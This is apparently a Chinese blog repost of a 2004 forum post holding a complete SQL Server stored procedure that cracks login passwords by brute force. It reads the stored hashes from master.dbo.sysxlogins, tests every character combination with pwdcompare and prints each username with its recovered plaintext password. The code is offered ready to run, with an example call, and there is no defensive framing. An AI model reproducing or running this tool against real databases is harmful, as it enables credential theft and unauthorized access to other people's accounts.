一个SQL密码破解的存储过程

原帖:http://community.csdn.net/Expert/topic/3271/3271317.xml?temp=.9382135

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO

/*--穷举法破解 SQL Server 用户密码

 可以破解中文,特殊字符,字符+尾随空格的密码
 为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII

 理论上可以破解任意位数的密码
 条件是你的电脑配置足够,时间足够  

--邹建 2004.08--*/

/*--调用示例

 exec p_GetPassword
--*/
create proc p_GetPassword
@username sysname=null, --用户名,如果不指定,则列出所有用户
@pwdlen int=2 --要破解的密码的位数,默认是2位及以下的
as
set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end
select top 255 id=identity(int,0,1) into #t from syscolumns
alter table #t add constraint PK_#t primary key(id)

select name,password
 ,type=case when xstatus&2048=2048 then 1 else 0 end
 ,jm=case when password is null then 1 else 0 end
 ,pwdstr=cast('' as sysname)
 ,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
 and name=isnull(@username,name)

declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)
declare @l int
select @l=0
 ,@s1='char(aa.id)'
 ,@s2='cast(aa.id as varchar)'
 ,@s3=',#t aa'
exec('
update pwd set jm=1,pwdstr='+@s1+'
 ,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwd.jm=0
 and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
begin
 select @l=@l+1
  ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'
  ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'
  ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
 exec('
 update pwd set jm=1,pwdstr='+@s1+'
  ,pwd='+@s2+'
 from #pwd pwd'+@s3+'
 where pwd.jm=0
  and pwdcompare('+@s1+',pwd.password,pwd.type)=1
 ')
end
 
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd
go

你可能感兴趣的:(WEB编程,DOTNET)